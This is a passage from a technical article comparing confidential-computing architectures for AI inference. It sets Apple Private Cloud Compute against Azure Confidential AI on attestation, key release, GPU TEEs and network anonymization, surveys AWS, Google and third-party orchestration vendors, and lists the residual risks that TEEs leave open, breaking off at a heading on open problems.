&lt;p&gt;A subtle and procurement-critical detail: Microsoft Azure Attestation does not directly attest the GPU. The MAA overview documents the SEV-SNP path and the platform-vs-guest distinction, but the GPU attestation is produced and signed by NVIDIA NRAS, not MAA [@ms-maa-overview] [@nvidia-dev-blog]. The composed MAA JWT &lt;em&gt;carries&lt;/em&gt; the NVIDIA-signed GPU attestation as a nested claim. A customer&apos;s relying party that wants to verify the GPU attestation against NVIDIA&apos;s hardware root of trust must validate the NRAS signature, not the MAA signature, on that nested portion.&lt;/p&gt;
&lt;p&gt;This is the &lt;strong&gt;double attestation&lt;/strong&gt; pattern: the SEV-SNP CVM attestation is signed by AMD VCEK; the H100 GPU attestation is signed by NVIDIA&apos;s on-die root of trust; MAA composes them into one JWT, but the two signatures must be verified against two different roots. The Azure &lt;code&gt;confidential-computing-cvm-guest-attestation&lt;/code&gt; and &lt;code&gt;az-cgpu-onboarding&lt;/code&gt; repositories provide the reference patterns for both halves of this verification [@az-cgpu-onboarding].&lt;/p&gt;
&lt;p&gt;The double attestation is one place the &quot;MAA is the verifier of record&quot; framing oversimplifies. MAA is the verifier of record for the &lt;em&gt;composition&lt;/em&gt; -- but the underlying signatures still come from AMD and NVIDIA. A relying party that wants to refuse a workload running on a TCB-rolled-back AMD CPU plus a CC-DevTools-mode H100 needs to check the AMD TCB version vector against a TCB-version policy (snpguest can do this) and the NVIDIA GPU mode field against a &quot;CC-On only&quot; policy. MAA can be configured to enforce both of these in the release policy, but the customer has to actively write the policy; the defaults will not catch a CC-DevTools-mode H100.&lt;/p&gt;
&lt;p&gt;Performance overhead is small. Zhu, Yin, Deng, Almeida, and Zhou (Phala / Fudan / io.net), in arXiv 2409.03992 (v4, November 5, 2024), benchmarked H100 CC-On on vLLM v0.5.4 with the ShareGPT dataset on Llama-3.1-8B-Instruct and report that &quot;for the majority of typical LLM queries, the overhead remains below 7%, with larger models and longer sequences experiencing nearly zero overhead&quot; [@phala-benchmark]. The dominant overhead source is the PCIe encrypted bounce buffer, capped at the ~4 GB/s CPU-encryption ceiling discussed in §5(b); large models amortise that cost across many tokens.&lt;/p&gt;
&lt;p&gt;The &quot;below 7%&quot; overhead number is benchmarked on a specific stack (vLLM v0.5.4, ShareGPT dataset, Llama-3.1-8B-Instruct) and depends on sequence length and batch size in non-trivial ways [@phala-benchmark]. Smaller models with short prompts and high batch turnover spend a larger fraction of wall-clock time on the bounce-buffer crossings; larger models with long context windows amortise that cost. Quoting &quot;below 7%&quot; without the workload qualification is misleading.&lt;/p&gt;
&lt;h3&gt;Axis 6: Network anonymization&lt;/h3&gt;
&lt;p&gt;This is the axis where the two architectures differ in kind.&lt;/p&gt;
&lt;p&gt;PCC routes client requests through a third-party-operated &lt;strong&gt;Oblivious HTTP&lt;/strong&gt; relay -- RFC 9458 [@ietf-rfc9458] -- that strips the client IP address before the request reaches the PCC cluster. This implements one of Apple&apos;s five named core requirements, non-targetability: an attacker who compromises the PCC fleet cannot single out a specific user&apos;s traffic because the fleet does not know which IP issued which request [@apple-pcc-blog]. Apple&apos;s Target Diffusion design layers RSA Blind Signatures (RFC 9474) [@ietf-rfc9474] on top to issue single-use credentials, so even the relay cannot link two requests from the same client.&lt;/p&gt;
&lt;p&gt;Azure has no equivalent operator-level anonymization layer. This is intentional in Azure&apos;s design: an enterprise customer who knows that traffic &lt;em&gt;originates from their own employees&lt;/em&gt; generally does not want to anonymize that traffic from their own audit logs. But it is an axis the two architectures differ on &lt;em&gt;in kind&lt;/em&gt; rather than in degree, and worth naming as such -- a procurement reader who needs operator-level anonymization will not get it from Azure CC-AI without building it themselves.&lt;/p&gt;
&lt;h3&gt;The six axes, side by side&lt;/h3&gt;
&lt;p&gt;The following table consolidates the comparison.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Apple Private Cloud Compute&lt;/th&gt;
&lt;th&gt;Azure Confidential AI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Silicon control&lt;/td&gt;
&lt;td&gt;Single-vendor end-to-end (Apple SoC, SEP, firmware, OS, runtime) [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;Multi-vendor commodity composition (AMD EPYC, Intel Xeon, NVIDIA H100, Microsoft hypervisor) [@ms-cc-overview] [@ms-sku-nccads]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware root of trust&lt;/td&gt;
&lt;td&gt;Per-node SEP bound to Apple-controlled CA [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;vTPM + AMD PSP / VCEK + NVIDIA on-die RoT + MAA as verifier-of-record [@ms-maa-overview] [@amd-kds]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attestation surface&lt;/td&gt;
&lt;td&gt;Per-device envelope cross-checked against public Transparency Log [@apple-pcc-release-transparency]&lt;/td&gt;
&lt;td&gt;MAA-issued JWT with documented &lt;code&gt;x-ms-*&lt;/code&gt; claims [@ms-maa-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Key release / state&lt;/td&gt;
&lt;td&gt;Stateless nodes; no customer keys; no release ceremony [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;SKR from AKV Premium / Managed HSM gated on MAA JWT [@ms-cc-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPU TEE&lt;/td&gt;
&lt;td&gt;Integrated Apple GPU in same SEP-rooted envelope [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;NVIDIA H100 CC-On + SPDM + NRAS joined to MAA [@nvidia-dev-blog] [@ms-sku-nccads]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network anonymization&lt;/td&gt;
&lt;td&gt;Third-party OHTTP relay strips client IP [@ietf-rfc9458] [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;No equivalent operator-level anonymization layer&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    subgraph PCC[&quot;Apple PCC stack&quot;]
        P1[Apple SoC + integrated GPU]
        P2[SEP per node&lt;br /&gt;Apple-controlled CA]
        P3[Transparency Log&lt;br /&gt;append-only public]
        P4[Stateless node&lt;br /&gt;no customer keys]
        P5[OHTTP relay&lt;br /&gt;third party]
    end
    subgraph AZ[&quot;Azure CC-AI stack&quot;]
        A1[AMD EPYC + NVIDIA H100&lt;br /&gt;multi-vendor]
        A2[AMD PSP + vTPM&lt;br /&gt;NVIDIA on-die RoT]
        A3[MAA JWT&lt;br /&gt;x-ms claims]
        A4[SKR from AKV Premium&lt;br /&gt;customer-managed keys]
        A5[no operator-level&lt;br /&gt;anonymization layer]
    end

An architectural property whereby every production software image actually serving customer requests is committed in advance to a public, append-only log accessible to any third party. The property requires both that the cryptographic log be publicly auditable (a Certificate-Transparency-style Merkle tree, for example) and that the system refuse to serve requests against images not present in the log. Apple Private Cloud Compute ships verifiable transparency as a first-class architectural primitive; no other major-cloud confidential-AI substrate ships an architectural equivalent as of mid-2026 [@apple-pcc-blog] [@apple-pcc-release-transparency].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The two architectures differ in &lt;em&gt;degree&lt;/em&gt; on five axes: silicon control, hardware root of trust, attestation surface, key release, and GPU TEE. On the sixth -- verifiable transparency of the production fleet -- they differ in &lt;em&gt;kind&lt;/em&gt;. Apple&apos;s Transparency Log is not a slightly-better MAA. It is an architectural primitive Microsoft does not ship.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A procurement assumption that PCC and Azure differ only in vendor preference misses the real architectural point. PCC&apos;s trust root collapses to Apple alone. Azure&apos;s trust root is spread across AMD, Intel, NVIDIA, and Microsoft as four independent signers. A single-vendor compromise on Azure (a leaked AMD VCEK signing key, an NVIDIA firmware bug, an MAA outage) does not collapse the whole stack the way an Apple-CA compromise would collapse PCC. This is a different security posture, not just a different brand. Whether trust diffusion is more valuable than verifiable transparency depends on the regulatory and threat-model context.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Six axes, two architectures, one axis where the divergence is in kind. But Apple PCC and Microsoft Azure are not the only games in town. Where do AWS Nitro Enclaves and Google Cloud Confidential Space fit on the same six axes?&lt;/p&gt;
&lt;h2&gt;7. Beyond the Two Headliners&lt;/h2&gt;
&lt;p&gt;If verifiable transparency is the architectural difference, the obvious question is why AWS and Google have not just shipped a Transparency Log too. The short answer is that the three other production substrates each chose a different epistemic model, and shifting any one of them to PCC&apos;s model would require rebuilding the trust root from scratch.&lt;/p&gt;
&lt;h3&gt;AWS Nitro Enclaves&lt;/h3&gt;
&lt;p&gt;AWS Nitro Enclaves does not anchor in a CPU-vendor TEE at all. Trust is rooted in AWS-as-signer through the Nitro Hypervisor and the Nitro Security Chip [@aws-nitro-hw]. The Nitro System &quot;provides enhanced security that continuously monitors, protects, and verifies the instance hardware and firmware&quot; and offloads virtualization resources to dedicated hardware [@aws-nitro-hw]. A Nitro Enclave is created from a parent EC2 instance and is &quot;isolated from the parent EC2 instance through the Nitro Hypervisor&quot;; per the AWS documentation verbatim, &quot;the Nitro Hypervisor ensures that the parent instance has no access to the isolated vCPUs and memory of the enclave&quot; [@aws-nitro-enclave].&lt;/p&gt;
&lt;p&gt;The trust model is different in kind from SGX, SEV, or TDX. Attestation is rooted in AWS&apos;s signing key, not in a CPU-vendor key. The Nitro architecture is processor-agnostic over Intel, AMD, and AWS Graviton, which is a different posture again -- the enclave&apos;s confidentiality does not depend on a specific silicon vendor&apos;s TEE primitive. There is also no published GPU confidential-computing extension for Nitro Enclaves as of mid-2026.&lt;/p&gt;
&lt;h3&gt;Google Cloud Confidential Space&lt;/h3&gt;
&lt;p&gt;Google Cloud Confidential Space combines Intel TDX (and AMD SEV / SEV-SNP) with Google Cloud Attestation and Workload Identity Federation. Per the GCA documentation: &quot;Google Cloud Attestation provides a unified solution for remotely verifying the trustworthiness of all Google confidential environments ... The service supports attestation of confidential environments backed by a Virtual Trusted Platform Module (vTPM) for SEV and the TDX Module for Intel TDX&quot; [@gcp-gca]. The overview page describes the multi-party-collaboration use case for PII, PHI, IP, and LLM-interaction data [@gcp-cs-overview].&lt;/p&gt;
&lt;p&gt;Google added an interesting wrinkle in 2025: an Intel Trust Authority integration that lets a GCP customer use ITA as a &lt;em&gt;second&lt;/em&gt; verifier alongside Google Cloud Attestation. Per the integration documentation: &quot;GCP Confidential Space provides a method for isolating a workload and sensitive data ensuring that data is released only to authorized workloads ... Intel Trust Authority is used to validate the evidence&quot; [@ita-gcp]. A second verifier is not the same architectural primitive as a public transparency log -- it provides cross-checking but not append-only public auditability -- but it is the closest move any other major-cloud confidential platform has made toward PCC&apos;s direction as of mid-2026.&lt;/p&gt;
&lt;h3&gt;Confidential Containers and the orchestration tier&lt;/h3&gt;
&lt;p&gt;Confidential Containers (CoCo) is a CNCF Sandbox project that wraps Kubernetes pods in confidential VMs running on AMD SEV-SNP, Intel TDX, or IBM Secure Execution [@coco-gh]. Per the project: &quot;Confidential Containers is an open source community working to enable cloud native confidential computing by ... Trusted Execution Environments to protect containers and data&quot; [@coco-gh]. CoCo composes &lt;em&gt;on top of&lt;/em&gt; the same Generation-3 silicon Azure CC-AI uses; it does not compete with PCC architecturally because it is at a different layer of the stack.&lt;/p&gt;
&lt;p&gt;Around CoCo and the underlying TEEs sits a small set of orchestration-tier vendors that take responsibility for what the raw SKUs do not. The procurement-relevant distinctions between them are sharper than the marketing copy suggests.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Anjuna Seaglass&lt;/strong&gt; is the cross-cloud unified confidential-deployment plane. It packages AWS Nitro Enclave, Azure CVM, and GCP Confidential Space behind a single command and a customer-supplied policy [@anjuna], with the explicit value proposition of &quot;any cloud, any region, with the only Universal Confidential Computing platform.&quot; Anjuna&apos;s Seaglass platform supplanted the older Anjuna Northstar nomenclature, but reads the same way to a procurement audit: a single control plane spanning three different silicon vendors&apos; TEE primitives, with a uniform policy DSL on top.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edgeless Systems&apos; Contrast&lt;/strong&gt; is the runtime-and-runtime-encryption layer for confidential Kubernetes. Contrast runs confidential container deployments on Kubernetes at scale, built on Kata Containers and the Confidential Containers concept, and provides PKI, mTLS, and encrypted state disks across the deployment [@edgeless-contrast]. The architecture documentation is explicit that &quot;the Contrast Coordinator is the central remote-attestation service for a Contrast deployment&quot; and verifies the Contrast components inside a confidential VM [@contrast-arch] [@contrast-docs]. Contrast is the active successor to Edgeless Constellation, which is now archived (&quot;This repository has been archived ... Edgeless Systems has shifted focus to Contrast, our solution for confidential containers, which addresses the modern needs of confidential cloud workloads&quot; [@edgeless-constellation]). The procurement signal is that customers evaluating Constellation should be redirected to Contrast in any new deployment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fortanix&lt;/strong&gt; is two distinct products that the marketing collapses into one. &lt;strong&gt;Fortanix Confidential Computing Manager (CCM)&lt;/strong&gt; is the orchestration and policy management layer that &quot;is used to securely deploy and manage confidential computing applications using Intel SGX, AMD SEV-SNP, and Intel TDX runtimes&quot; [@fortanix-ccm]. &lt;strong&gt;Fortanix Data Security Manager (DSM)&lt;/strong&gt; is the FIPS 140-2 Level 3 HSM that holds the keys; per Fortanix&apos;s DSM page, DSM &quot;delivers Cryptographic Services, Key Management Services, Secrets Management, Tokenization, Code Signing ... powered by Confidential Computing&quot; [@fortanix-dsm] and carries FIPS 140-2 Level 3 certification on the underlying platform [@fortanix-fips]. Procurement teams that need a customer-managed-keys story almost always need both: CCM to orchestrate the confidential-workload deployment, DSM to custody the keys.&lt;/p&gt;
&lt;p&gt;CCM is not DSM. CCM is the orchestration plane (which workload runs where, attested by what); DSM is the FIPS 140-2 Level 3 HSM (which holds the keys, releases them on attested workload verification, audits the access). A procurement that asks for &quot;Fortanix&quot; without specifying CCM or DSM is asking for two different products at two different price points with two different compliance postures. The two integrate but they are not the same SKU.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Pick when...&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Anjuna Seaglass&lt;/td&gt;
&lt;td&gt;Cross-cloud confidential deployment control plane [@anjuna]&lt;/td&gt;
&lt;td&gt;You run the same regulated workload on more than one cloud and need one policy DSL spanning AWS Nitro + Azure CVM + GCP Confidential Space&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Edgeless Contrast&lt;/td&gt;
&lt;td&gt;Confidential Kubernetes runtime with mTLS and encrypted state [@contrast-arch] [@contrast-docs]&lt;/td&gt;
&lt;td&gt;You run confidential workloads as Kubernetes pods and want a remote-attestation Coordinator inside the deployment rather than an external SaaS verifier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fortanix CCM&lt;/td&gt;
&lt;td&gt;Confidential-app orchestration on SGX/SEV-SNP/TDX [@fortanix-ccm]&lt;/td&gt;
&lt;td&gt;You need centralized policy for which signed confidential workloads run on which TEEs, with audit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fortanix DSM&lt;/td&gt;
&lt;td&gt;FIPS 140-2 Level 3 HSM with attested key release [@fortanix-dsm] [@fortanix-fips]&lt;/td&gt;
&lt;td&gt;You need customer-managed keys, FIPS 140-2 L3 custody, and attested-workload-gated release as a single SKU&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The third-party tier exists because the raw cloud SKUs sell the &lt;em&gt;substrate&lt;/em&gt; but not the &lt;em&gt;operational pattern&lt;/em&gt;. Procurement decisions in this category typically pair a cloud SKU with one or two of these orchestration vendors to get something workable for a regulated workload.&lt;/p&gt;
&lt;h3&gt;Where these fit on the six axes&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Substrate&lt;/th&gt;
&lt;th&gt;Silicon&lt;/th&gt;
&lt;th&gt;Root of trust&lt;/th&gt;
&lt;th&gt;Transparency&lt;/th&gt;
&lt;th&gt;GPU TEE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Apple PCC&lt;/td&gt;
&lt;td&gt;Apple end-to-end [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;SEP + Apple CA [@apple-sep-guide]&lt;/td&gt;
&lt;td&gt;Public Transparency Log [@apple-pcc-release-transparency]&lt;/td&gt;
&lt;td&gt;Integrated Apple GPU [@apple-pcc-blog]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure CC-AI&lt;/td&gt;
&lt;td&gt;AMD + Intel + NVIDIA + MS [@ms-cc-overview]&lt;/td&gt;
&lt;td&gt;AMD PSP + NVIDIA RoT + vTPM + MAA [@ms-maa-overview] [@amd-kds]&lt;/td&gt;
&lt;td&gt;None (MAA claims only) [@ms-maa-overview]&lt;/td&gt;
&lt;td&gt;NVIDIA H100 CC-On [@nvidia-dev-blog]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS Nitro Enclaves&lt;/td&gt;
&lt;td&gt;AWS-signed, CPU-agnostic [@aws-nitro-hw]&lt;/td&gt;
&lt;td&gt;Nitro Hypervisor + Security Chip [@aws-nitro-enclave]&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None at GA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GCP Confidential Space&lt;/td&gt;
&lt;td&gt;Intel TDX + AMD SEV-SNP [@gcp-cs-overview]&lt;/td&gt;
&lt;td&gt;vTPM + TDX Module + GCA (+ optional ITA) [@gcp-gca] [@ita-gcp]&lt;/td&gt;
&lt;td&gt;None (second verifier via ITA)&lt;/td&gt;
&lt;td&gt;None at GA on Confidential Space&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Third-party tier (CoCo / Contrast / Anjuna)&lt;/td&gt;
&lt;td&gt;Composes on top of cloud SKUs [@coco-gh] [@edgeless-contrast]&lt;/td&gt;
&lt;td&gt;Inherits underlying TEE root&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Inherits underlying GPU TEE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Five substrates, one rough trade-off space. But every one of them rests on silicon, and silicon has its own theoretical limits. What can no TEE-based confidential AI architecture do?&lt;/p&gt;
&lt;h2&gt;8. What No TEE Can Do&lt;/h2&gt;
&lt;p&gt;The Confidential Computing Consortium&apos;s &quot;A Technical Analysis of Confidential Computing&quot; v1.3 -- the vendor-neutral definitional document both Apple and Microsoft anchor on -- explicitly enumerates side-channels as a residual risk [@ccc-technical-analysis]. This is not a contestable empirical claim. It is the field&apos;s own lower bound on what TEE-based confidential AI can deliver. The CCC names what the architecture &lt;em&gt;does not&lt;/em&gt; close, in plain text, in the same document that defines what it &lt;em&gt;does&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;There are roughly six classes of limit, and the architectures we have walked do not close any of them by construction.&lt;/p&gt;
&lt;h3&gt;1. Side-channels on shared silicon&lt;/h3&gt;
&lt;p&gt;The Foreshadow / L1TF, SgxPectre, and Plundervolt cascade [@foreshadow] [@sgxpectre] [@plundervolt] is the historical evidence. The principled extension is direct: any TEE built on shared microarchitectural state -- shared caches, shared branch predictors, shared functional units, shared voltage / frequency control -- inherits a side-channel surface that the architectural threat model does not name. Both Apple&apos;s SEP and the AMD-Intel-NVIDIA composition rest on silicon that does not have an architectural primitive that closes this surface. Wojtczuk and Rutkowska&apos;s 2009 paper on Intel TXT made the same point fifteen years earlier in a different generation, demonstrating that SMM-based bypasses of TXT were not addressed by TXT&apos;s own threat model [@txt-attack]. The cycle keeps repeating.&lt;/p&gt;

Even Intel SGX&apos;s memory encryption/authentication technology cannot protect against Plundervolt. -- the Plundervolt project page [@plundervolt]
&lt;h3&gt;2. Trust-anchor compromise&lt;/h3&gt;
&lt;p&gt;Every vendor behind a hardware root of trust is itself a trust anchor that nothing inside the architecture can close. AMD-as-signer through the PSP and VCEK certificate chains [@amd-kds]; Intel-as-signer for the TDX Module, SEAMLDR, and Provisioning Service; NVIDIA-as-signer for the on-die RoT and NRAS; Microsoft-as-signer for the MAA service [@ms-maa-overview]; and Apple-as-signer for the SEP-bound CA and the Apple-controlled Transparency Log [@apple-pcc-blog]. If any of those signing infrastructures is compromised, the architecture cannot defend itself against the signer. PCC&apos;s trust root collapses to Apple; Azure&apos;s spreads across four vendors but each one is still a trust anchor for the workload that depends on it.&lt;/p&gt;
&lt;h3&gt;3. ROM-burned single-signer revocation&lt;/h3&gt;
&lt;p&gt;Fuse-burned silicon roots of trust are not field-revocable on a chip already deployed. If an attacker recovers a vendor-signing key that has been burned into the boot ROM of millions of chips, the recovery path is fleet rotation, not credential revocation. This is not a flaw of any specific vendor; it is a property of how hardware roots of trust are physically anchored. The recovery model for a leaked AMD ARK key, an Intel SEAM key, or an Apple SEP signing key is the same: replace the silicon. That is a multi-quarter operation at fleet scale.&lt;/p&gt;
&lt;h3&gt;4. Supply-chain compromise of the AI model&lt;/h3&gt;
&lt;p&gt;Apple binds the model into the attested image hash. The same Transparency Log that proves what &lt;em&gt;code&lt;/em&gt; is running also proves what &lt;em&gt;model weights&lt;/em&gt; are running, because the model is part of the published image [@apple-pcc-blog] [@apple-pcc-release-transparency]. PCC closes the model supply-chain question at the architecture level.&lt;/p&gt;
&lt;p&gt;Azure shifts model integrity to customer-controlled SKR of model artefacts. The model weights become encrypted blobs that the workload unwraps inside the TEE using a customer-managed key released only on a satisfying MAA JWT [@ms-cc-overview] [@ms-workshop-llm]. The customer is the trust anchor for the model&apos;s identity, not the cloud provider. This is a different trust-rooting model -- not stronger or weaker in the abstract, but routed through different organizations. It is &lt;em&gt;not&lt;/em&gt; accurate to say only Apple defends against model supply-chain compromise.&lt;/p&gt;
&lt;h3&gt;5. Prompt-output exfiltration via the model itself&lt;/h3&gt;
&lt;p&gt;The TEE protects the &lt;em&gt;input&lt;/em&gt; boundary -- it can prove the cloud operator never saw the prompt. It does not constrain what the model puts in the &lt;em&gt;output&lt;/em&gt;. A model that is fine-tuned, prompt-injected, or simply chooses to emit memorised data can exfiltrate information through its own output channel, and no architectural primitive in either PCC or Azure CC-AI prevents that. Both architectures are equally exposed on this axis. This is also why prompt-output safety, content filtering, and model-side privacy controls are unrelated work that confidential computing does not subsume.&lt;/p&gt;
&lt;h3&gt;6. Compelled vendor and lawful access&lt;/h3&gt;
&lt;p&gt;A property of the trust-rooting model, not of any one architecture. If a vendor is compelled by law to push a software update that exfiltrates user data, the architecture cannot defend itself against that vendor. PCC&apos;s compelled-vendor exposure is concentrated on Apple. Azure&apos;s is distributed across AMD, Intel, NVIDIA, and Microsoft, but a compelled Microsoft is sufficient to compromise an MAA-rooted workload; the diffusion does not multiply protections.&lt;/p&gt;
&lt;h3&gt;And one more: MAA-as-service compromise&lt;/h3&gt;
&lt;p&gt;Azure&apos;s centralised verifier is a control point Apple does not have, because Apple&apos;s verifier is the user&apos;s device itself. If MAA is compromised -- if an attacker controls the MAA signing key, or if the MAA policy-evaluation code is modified maliciously -- every relying party that trusts MAA-issued JWTs trusts the attacker.&lt;/p&gt;

The CCC&apos;s &quot;A Technical Analysis of Confidential Computing&quot; v1.3 explicitly enumerates side-channels as a residual risk that the architecture does not close by construction. This is the field&apos;s own acknowledged lower bound. Any product claim that &quot;our confidential computing stack defends against all side-channels&quot; is, in 2026, either overstated or contradicting the CCC&apos;s own technical analysis [@ccc-technical-analysis]. The honest framing is that confidential computing defends against the architecturally-named threats (memory disclosure to the operator, hypervisor-mediated remap, plaintext-in-DRAM at-rest exposure) and that side-channels remain a separate research and engineering domain.
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Threat&lt;/th&gt;
&lt;th&gt;Apple PCC&lt;/th&gt;
&lt;th&gt;Azure CC-AI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Malicious cloud operator (passive memory disclosure)&lt;/td&gt;
&lt;td&gt;Defended (SEP-rooted attestation, OHTTP relay) [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;Defended (SEV-SNP / TDX guest measurement, MAA verifier) [@ms-maa-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromised hypervisor (active remap / Iago attacks)&lt;/td&gt;
&lt;td&gt;Defended (Apple-controlled kernel + SEP-rooted measured boot) [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;Defended (SEV-SNP RMP enforces page ownership; TDX Module isolates) [@ms-cc-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supply-chain compromise of the AI model&lt;/td&gt;
&lt;td&gt;Defended at architecture level (model bound into Transparency-Log-published image) [@apple-pcc-blog]&lt;/td&gt;
&lt;td&gt;Defended via customer-controlled SKR of model artefacts; trust shifts to customer [@ms-workshop-llm]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Side-channels on shared silicon&lt;/td&gt;
&lt;td&gt;Not closed by construction [@ccc-technical-analysis] [@plundervolt]&lt;/td&gt;
&lt;td&gt;Not closed by construction [@ccc-technical-analysis] [@cipherleaks]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compelled-vendor / lawful access&lt;/td&gt;
&lt;td&gt;Not closed by construction (trust collapses to Apple)&lt;/td&gt;
&lt;td&gt;Not closed by construction (trust spreads across four vendors; compelled MAA suffices)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier / signer compromise&lt;/td&gt;
&lt;td&gt;Apple SEP-CA + Transparency Log signer is a control point&lt;/td&gt;
&lt;td&gt;MAA signer + AMD / Intel / NVIDIA signers are control points&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prompt-output exfiltration via model&lt;/td&gt;
&lt;td&gt;Not closed by construction&lt;/td&gt;
&lt;td&gt;Not closed by construction&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Neither architecture closes the gap by construction. Apple&apos;s verifier is the user&apos;s device, and the user&apos;s device trusts Apple&apos;s SEP-bound CA and the Apple-controlled Transparency Log signer. Azure&apos;s verifier is MAA, which is a Microsoft-operated service with its own signing infrastructure. Apple&apos;s single-vendor problem and Microsoft&apos;s centralised-verifier problem are two shapes of the same architectural gap: the verifier itself is a trust root the architecture cannot externally audit.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Trust diffusion (Azure&apos;s contribution) and verifiable transparency (Apple&apos;s contribution) close &lt;em&gt;different&lt;/em&gt; trust-anchor gaps. Neither closes both. No production substrate as of mid-2026 closes both gaps simultaneously. A hypothetical Generation-7 design that combined Azure-style multi-vendor TEE composition with Apple-style append-only transparency of production images would close that gap. No vendor has shipped it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two architectures, two distinct upper bounds, neither closing the same gap. So what is the field actually working on?&lt;/p&gt;
&lt;h2&gt;9. Where Active Work Is Happening&lt;/h2&gt;
&lt;p&gt;September 5, 2024, arXiv. Ceren Kocaoğullar (University of Cambridge), Tina Marjanov (Cambridge), Ivan Petrov (Google), Ben Laurie (Google), Al Cutter (Google), Christoph Kern (Google), Alice Hutchings (Cambridge), and Alastair R. Beresford (Cambridge) post &quot;A Confidential Computing Transparency Framework for a Trust Chain&quot; [@kocaogullar-transparency]. The paper does not name MAA specifically. It generalises the question Apple PCC raises in concrete form: can the verifiable-transparency primitive be replicated on commodity multi-vendor silicon without collapsing to a single trust root? The authors propose &quot;a three-level conceptual framework providing organisations with a practical pathway to incrementally improve Confidential Computing transparency&quot; [@kocaogullar-transparency]. The inclusion of Ben Laurie -- one of the original architects of Certificate Transparency (RFC 6962) -- is not incidental. The paper is the direct architectural descendant of CT brought into the confidential-computing domain.&lt;/p&gt;
&lt;p&gt;The v2 December 5, 2024 revision of the Kocaoğullar et al. paper added an 800+ participant empirical study showing that greater transparency improves end-user trust in confidential computing services [@kocaogullar-transparency]. That empirical signal is the closest thing the field has, as of mid-2026, to a measurement of the procurement consequences of verifiable transparency vs verifier-as-a-service. The framework itself is conceptual; the empirical contribution is the part procurement teams should read.&lt;/p&gt;
&lt;p&gt;Six open problems are visible in the current production work.&lt;/p&gt;
&lt;h3&gt;9.1 Verifiable transparency of the verifier itself&lt;/h3&gt;
